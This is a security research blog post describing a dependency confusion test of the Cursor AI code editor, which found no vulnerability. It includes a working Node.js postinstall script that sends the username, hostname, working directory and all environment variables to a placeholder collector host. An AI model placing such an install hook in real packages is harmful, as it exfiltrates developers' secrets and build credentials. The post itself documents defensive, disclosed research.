Snyk Security Labs Testing Update: Cursor.com AI Code Editor

Written by:
Danny Allan

January 14, 2025

Snyk’s Security Labs team aims to find and help mitigate vulnerabilities in software used by developers around the world, with an overarching goal to improve the state of software security. We do this by targeting tools developers are using, including new and popular software solutions. With the meteoric rise in AI tooling – specifically the fast-growing field of AI-enabled development environments – we have been including such software in our research cycles.

One such piece of software is Cursor’s AI Code Editor, a competitor of VSCode and other popular developer IDEs that integrates AI code assistance into the developer experience. With research like this, our hope is that we find no vulnerabilities; if we do, it gives us an opportunity to responsibly disclose them and ensure that all developers using the software are safer. Cursor publicly encourages reporting security vulnerabilities in its product and has published a guide and an established channel for such reports.

As part of this research, the Snyk Security Labs team determined that multiple private extensions are bundled with the software. Extensions for VSCode (upon which the Cursor AI Code Editor is based) are built just like classic Node.js dependencies and are described using package.json files. Our idea for a potential attack vector was that Cursor internally treated these VSCode extensions as NPM packages and pulled them from an internal registry during builds. If that had been the case (we now know it is not) and the build system was misconfigured, a dependency confusion attack would have been possible. While we figured this setup was unlikely, it was a worthwhile research avenue because, had it been the case, it could have had a considerable impact on both Cursor’s systems and their users.
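For context, an extension manifest looks much like any other npm package manifest, which is why a name collision with the public registry is even conceivable. The manifest below is a hypothetical illustration of that shape, not an actual Cursor extension; if a misconfigured build resolved a name like this against the public NPM registry rather than an internal one, a public package with the same name could be installed in its place.

```json
{
  "name": "example-internal-extension",
  "displayName": "Example Internal Extension",
  "version": "0.0.1",
  "publisher": "example-vendor",
  "engines": { "vscode": "^1.85.0" },
  "main": "./out/extension.js",
  "contributes": {
    "commands": [{ "command": "example.hello", "title": "Say Hello" }]
  }
}
```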

To test this theory, we uploaded packages to the public NPM registry with names matching those we suspected to be part of the Cursor AI Code Editor’s build. This is a common technique for testing for dependency confusion. It is extremely unlikely that these packages would have been installed by developers or systems other than those being tested at Cursor – in fact, it was unlikely they would ever be installed at all. Still, in their descriptions we marked all of the packages as testing packages originating from Snyk’s Security Labs team, included a direct email address to contact the author, and set a narrow time window in which the packages would be available (24 hours). The source code of these packages was very small and made no attempt to obfuscate its behavior: on install, each package performed an HTTP request back to our researchers containing the username, hostname, current directory and (in later versions) environment variables, as sketched below. These outbound requests were necessary to determine whether a fully “blind” installation had occurred. In the later versions, Snyk’s researchers added additional fields to the collected data to rule out false positives caused by automated scanners downloading and executing the packages, which were outside the scope of the proof of concept. For Snyk to submit reliable and accurate reports to the Cursor security team, we needed to confirm that any installs were executed by Cursor and that what we had identified was a legitimate dependency confusion issue.
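The following is a minimal sketch of the kind of install-time callback described above, assuming it is wired up through a package.json install hook such as "postinstall": "node collect.js". The collector hostname, path, and field names are hypothetical placeholders, not the actual infrastructure used in our testing.

```javascript
// collect.js: a sketch of an install-time beacon for a dependency confusion test.
const https = require("https");
const os = require("os");

// Gather only the low-sensitivity fingerprint data described in the post:
// username, hostname, current working directory and (in later versions)
// environment variables, which help rule out automated-scanner false positives.
const payload = JSON.stringify({
  username: os.userInfo().username,
  hostname: os.hostname(),
  cwd: process.cwd(),
  env: process.env,
});

// Report back to a researcher-controlled collector over HTTPS.
const req = https.request(
  {
    hostname: "collector.example.com", // hypothetical research endpoint
    path: "/dependency-confusion-poc",
    method: "POST",
    headers: { "Content-Type": "application/json" },
  },
  (res) => res.resume() // drain the response; only delivery matters
);

req.on("error", () => {}); // fail quietly so the package never breaks an install
req.write(payload);
req.end();
```

Keeping a script like this small and unobfuscated makes the package’s intent obvious to anyone who inspects it, which matches the transparent, time-limited approach described above.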

In the end, Snyk Security Labs found no indications that Cursor was in any way vulnerable to dependency confusion. Additionally, no sensitive data was disclosed to us during our testing. These types of attack vectors – low complexity and low likelihood, but high impact – are an important research subject, as the low barrier to entry may make this attack relatively easy for malicious actors to execute. Snyk Security Labs regularly conducts vulnerability research and strives to uphold the highest testing standards in the interest of improving developer security. 

By testing for these vulnerabilities, Snyk’s Security Labs hopes to beat attackers to the punch and ensure that the software and systems developers around the world are using every day are safe.
